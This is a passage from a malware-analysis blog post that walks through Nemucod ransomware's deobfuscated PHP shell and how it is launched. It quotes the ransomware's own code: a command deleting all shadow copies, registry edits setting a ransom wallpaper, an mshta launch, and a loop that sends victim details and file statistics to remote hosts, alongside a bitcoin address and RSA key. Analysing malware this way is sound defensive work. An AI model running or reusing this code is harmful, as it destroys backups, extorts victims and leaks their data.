Vr0keEmYOtWTmEl8Huul8yk6N3G3+9DO4wihzVhc8GTO08GXbsXYOM9J9o2xT1PX9f0zzu8i76HnpbwrjtD7imNxwXPMufucML/Cec5H3fk97p7nnbfR+S328xPbFUdYuMx5ujGBQjvv+pg6E7N+3vkUnd+npFJphBDLWFzwHHVui61hxSjnc4lL3XoEGHpRVG5dcu7fMuZ1ef4LIyxkzkMfnqPOl2MLx/QKViqXJ2xWpO2080b4arLGhREWys7l0f+o8x7nG6iTuM+0ZBSVhkLrmnPZYau1lUeY+VDL6aa4cNi5yQaFwM0nKiS88FXFWeehi8++lP7SlyF9n+z3clscfeFh5/mGBpE5OZ288i6NDGsdWaSOmEas6PrgfLHnlWw7H2JxqzYC6TwUZs7TwX1/TW0rhX7N3OgSthQUvp4663wptsK5fmstfQHWe8ujWpp04WHnFucbNKsaW3Y+ZkUHnK9fnR90Pial+VfuohDnl2BXJW0woy/NZUUHnC8JHw8618ftuOy3ByMLcX4J7qBupuwCTNwNTzpfSnvpvPB+rkfo447dxcUxlA9r4WHnDc43+FizE7MfUhcvbJxz/rFWO+BcXjoJ37iuUcSAGrEhHHbeZoOCYEnuLeYr+XY7FB12bldd3nme/sII8uKQCCvU7tbCw87zDQ0Es5Mxnrand7HoogQzFT6fu3x753I/rY4gzvVdXe18XCtlzreuw+G8ivX7Znah1fpX55y7o4F3boWz6gjrW8zjFuu+5Jzr7dssqfprzF9ipOtPOp+cI++8/r2aGMFvGSa4esl5k21nIElPni5xPkTn9e/PpfN2fRWlhojkceKg8/Ubu+5sJv6G8J66dTGmrnna+byreucb98mI93q3YcSdOrwwIraDzo3azCDHOFFuMabO77HnnY+9cN7G3m/Jfa96hE//tu5XjSG6bu3/mPO43UGFpuI87i3li6W9/rgkbz2dmwfnNpTZSTuPIzRK8VwyKdKbuOZuaoMX4oQEq/cLnbrsmswR5w/f7eJc6+qKIwTV1tXpkzrnnX9B5r4vd+1Sp27MikbRtJL2pUpwrv5cLXc+V04u+c3NkjqnncswIeVjy/mQFY2iaSXtS6PoXP0hS1cawcaOfVeqTnaD7q5z3s23MVFUv/td6hHny7roPJwxlJyPoZ9uqdu6l0mds87fl63fg1ZlqXBx/aTztYZwLuuVRvgQAVjXQzLiSefvStVvgxV6VerGvOiI8y70+plWTE8JxywAfwkn1hnm4lPOh8tTBE9wZ/cDAAAAAAAAAAAAAAAAAAAAAAAAAACAb8B6G/tncV3+yxSnMYXb3MW994e7kNVfCuvk4G/EyD9maNY70NM/YEj/dMBh9WKr/kwhaZP9TUQs6PKg0lV3EaQppT0JJf4GlfyjtSaZQvaLQ2Pep9pwSmHFUUN3WTClwUOZX0iTvBPdK2TjPr7EeSsWuzSmbJVwrh7IWQtF/OzYo14msmpTHepn7buNsA46LwV02HkhupdQPyDh8vkFzitdxlSoVcK5dTFqklDknzmNruyWlYmpm6xXWf2xEdYx5/ngoUe/kGZkM7rXqD47c19QMrdWzSpps9llzEKISK8Szsvzr4YSi/OymFX9AM84juOxEdYx56WADjsvRPciIun+9xa/2rlOUJuvis7lAzkFOhT92MYxzlOXJT9epaLI/5K9EtYx56WADjvPo3sVE3No3TBf5bz3DsfYS+nZX8L5Ov8d543uovddRJKHsJs0CG34sRHWIeeFwUOc0oMMeSu6V2lDPvWzM8Xs0nAc+dxMnFHSptDlOovsnMz6NIcX0rmZ0vqFUNZROvHCbwehB99r6QGesQv3Cyf+d89KYR1yXhhc5ruUsM3oXkVEaKbsifShvHAKsetctMm7HEUb+YnKhJRaZSd7IGc1FPEn8H4Tk5+1c+fNlMSgfjmhWVbVwjrkvDB43x/93bM8upcp/L7WVzgf/asm6SUKiy+D8/sR5zYmKb40oUYjey09wLNP3kLNo6+H5fbecd+5HjybetV5Ht3LbDw7sxaO4yXn4VXiXP42r5UBpQ/krIfSiiQFd7GZP1MNMRV+DKH1Iy88NsJyP270uem8MHg29Zrzt/xUg3be9V/iXLeZkorj+jq81wfn0xHnssfWjxu7Db8c7WMySnDsQoZbDWvS/xmKeSkMPnPIeSG61zHKuRyuFo7jEufpZmzljjBN8QQjfSBnPRTfSnYnntYXXrqYsgd49oUff6+GNYXBtXPZaWnwmSPOS9G9Tgxxku+aYpg3OrdxS1tpZEXj1nnnzRHnH7KG3z83nFu5jRS62A5rCmdoBee56NPOC9FdgDqJSz64lsNxvO689cMmRemCd66ilMjsqcOnX6g6V3L6UhfbYU3hw0HJ+XpoeN55MboLqDw7c4g13uS8CXMS27GRnfqkOOchDVkwMb/6rTfkeM+57k51sR3W5K76PcrOJzXis87T6b6Oy1fy7MwhVthyrrbEHefasElbx1K/0LhAnPNlwFIwN9lL7vxz3/mg+jvifPDOXTcV52N/wrmn
for ($i = 1000;$i < strlen($bmp);$i++) if (mt_rand(1, 100) < 10) $bmp[$i] = chr(mt_rand(1, 255)); 
$fp = fopen($fn . ".bmp", "wb"); 
fputs($fp, $bmp); fclose($fp); 
exec("reg add " . $cq . "HKCU" . $cs . "Control Panel" . $cs . "Desktop" . $cq . " /v Wallpaper /f /t REG_SZ /d " . $cq . $fn . ".bmp" . $cq); 
exec("RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters"); exec("mshta.exe " . $cq . $fn . ".hta" . $cq); 
exec("vssadmin.exe Delete Shadows /All /Quiet"); 
} foreach ($lands as $host) { file_get_contents("http://" . $host . "/counter/index.php?log=" . base64_encode(gzdeflate($address . ", " . $price . ", " . $keypub . ", " . md5($_ENV["COMPUTERNAME"] . ", " . $_ENV["USERNAME"] . ", " . $_ENV["OS"] . ", " . $_ENV["PROCESSOR_IDENTIFIER"]) . " " . $stat_drives . " " . $stat_files))); }

In a nutshell, above you will see the enumeration process of files on the drive and then using a RSA public key (var $keypub) to encrypt each file.  In section 3 you will see where the $kyepub argument is coming from. You can also see towards the end of the script a registry modification command related to adding a new wallpaper message (a message informing the victim that his/her file on the system are encrypted. Look at figure 7) and the vssadmin command which is used the delete all shadow copies on the system:

exec("vssadmin.exe Delete Shadows /All /Quiet");

Section 3 – Execution of the Obfuscated PHP Shell (evil.php)

The third section in the Javascript file secondoutput.js is the following section:

ws.Run(fn+".exe "+cq+fn+".php"+cq+" 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2 0.1075 MIIBIjANBgkqhkiG9w0B

In this section the Javascript uses the PHP interpreter file 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.exe (typically called php.exe) to execute the evil.php PHP shell. As you will see below, the PHP interpreter run the PHP shell 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.php (evil.php) using additional arguments:

157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2 0.1075 MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAi78TzT

On a side note, in the previous section (section 2) we have changed the eval value to echo to avoid executing the PHP shell on the system and instead to output the information to the a new file that we named evil2.php. This change allowed us to read through the code and review the content of this PHP shell to allows us understand the functionality of this PHP shell. However, in section 3 the eval section is used for execution purposes and NOT the echo function.

As we saw in section 2, this is where the PHP shell gets the bitcoin value, the bitcoin address and public key to encrypt the files on the system.

  • Price = 0.1075
  • BitCoin Address = 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2
  • Public Key = MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAi78TzT 4zY95ZcMDYUN3YozYlf3VsLMEEVLi0M9/EVLAsDOasmgUEv+dXrxE55WK8UX6lFV00U6PTwxMgIfJXmUEND6aoIZoPcp djxoB99ZZZQqclA7R4eO24+OgMltMFrgUqATmP2G1VArMyi36muwh573z5ymtJ+p1TER9yekK0TtcNpZOSZ/hQXL+qHL qjtgrowHPENtjjBMDxffKGQmaU73Pkz3z35Z1qT29YADuwSvtW8fvC6mzUAr9rRXZlD+aNMjec6YSqlyzpWz5kNOoWu8 mbyLI0jG6QaGEYxH60IpOc2b2fLnLw7ebN6bMRNvZWdDK4BQ98kcjvowEVLwIDAQAB

The public key argument is equal to the $keypub variable inside the script (see section 2). Please note that on some victim Operating System (OS) the execution of the PHP interpreter may generate an error message as shown in figure 5:

Figure 5: Error Message

This is because the OS is likely missing the following package from Microsoft Visual C++ Redistributable for Visual Studio 2012 Update 4. If you are following along and attempting to run this malware on your system for analysis you may want to download and install this package before running this command line. Okay, if you resolved this issue and successfully executed this Nemucod ransomware PHP shell on your system, you should see that the PHP shell spawned the cmd.exe process and the cmd.exe process spawned the mshta.exe process. Figure 6 shows this parent/child process relation:

Figure 6: parent/child process relation

The mshta.exe process is responsible for executing the file 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.hta. This file was created by the Nemucod PHP shell  and containing information about how to decrypt the files in the system including payment options and receiving the decryption key. This information is displayed in the background as a wallpaper as you can see in Figure 7:

Figure 7: Ransomware Wallpaper Message

This is pretty much the entire functionality of the Nemuncode ransomware in a nutshell.  Blog post part III will include dynamic and static analysis of the Nemucode and Kovter Malware Variants. 

Indicators of Compromise 

The following list contain MD5 hashes of files related to this attack:


The following domains:

During the time of writing this blog post multiple security vendors blacklisted these domains.

Leave a Comment

Your email address will not be published. Required fields are marked *